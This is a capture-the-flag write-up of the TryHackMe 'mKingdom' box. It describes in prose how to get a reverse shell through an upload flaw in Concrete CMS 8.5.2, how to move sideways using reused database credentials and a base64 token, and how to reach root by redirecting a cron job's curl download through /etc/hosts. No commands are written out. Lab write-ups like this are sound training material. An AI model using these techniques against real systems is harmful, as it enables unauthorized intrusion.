RedTeam Capstone Challegen TryHackMe

mKingdom

Beginner-friendly box inspired by a certain mustache man.

LogomKingdomTryHackMe

Recon

Let's start with a nmap scan. We can see only one open port: 85. We are dealing with an Apache httpd 2.4.7 web server. The title suggests defacing has happened.

Visiting the site we are greeting with the picture of Bowser the famous villain from Mario.

We enumerate with Gobuster.

Manually and with Gobuster we reach a blog at endpoint /app/castle.

There is only one blog post.

We see that the CMS concrete is being used. In the source, we also find the version used: 8.5.2. This is vulnerable to authenticated remote code execution.

This vulnerability is explained step-by-step in the following post. The requirement here is to be in possession of admin credentials, as this allows you to modify upload restrictions by adding file types and then uploading and triggering a PHP reverse shell.

LogoConcrete CMS: Remote Code Execution (Reverse Shell) - File M... - vulnerability database | Vulners.comVulners Database

Initial Access

We know about the possible entry point through authenticated RCE, but still need credentials.

We can log in with the username admin and a very password that starts with p.

We are able to log in and access the admin dashboard available.

Select System & Settings, then Allowed File Type.

Next, add php, separated by a comma, and save the changes.

We can use the reverse shell from PentestMonkey.

LogoGitHub - pentestmonkey/php-reverse-shellGitHub

To upload files, we simply drag them into the File Manager at /app/castle/dashboard/files/search⁣⁣. We get the URL to access the file. Before we do that, we set up a listener on our chosen port

Next, we visit the link presented.

We get a connection from our reverse shell as www-data. Unfortunately, we won't find the user flag here. We have to move laterally. By inspection /etc/passwd we find two users, toad and mario.

We run linpeas.sh and discover that cat is a SUID binary owned by the user toad. This means that running cat as a different user will execute the binary with toad's privileges.

MySQL is running internally. Maybe we can retrieve some credentials from the web app.

By examining the configuration files, we can find the database credentials. Although exploring the database might not reveal any new users, it's worth checking if the same credentials are being reused elsewhere.

We are able to switch users for toad.

While enumerating the target manually, we find a strange password token in the env variable encoded in base 64.

We can decode it and switch to mario

Here we find the first flag, and we can't read the flag, because of the SUID bit set. We look for another copy of cat on the machine and find one at /usr/lib/klibc/cat, With that, we can read the last flag.

Privilege Escalation

We upload and run pspy64 on the machine to discover processes running in the background.

Here we find a cronjob that uses cURL to download a script at mkingdom.thm and execute it. If we are somehow able to write to /etc/host, we can uplaod a malicious script that executes a reverse shell for us.

We can confirm that we are able to write to /etc/hosts as mario

With nano or vi we can update the /etc/hosts and replace the existing IP for mkingdom.thm with our own IP address

Next, we create the folder structure, create the script, place it in the correct location, and set up a web server on port 85 using Python. Besides this, a listener is running on our desired port.

After a some time, the script gets downloaded.

We get a reverse shell connection back as root. We can read the flag in the home directory of root using cat.

PreviousCapture ReturnsNextCreative

Last updated

Was this helpful?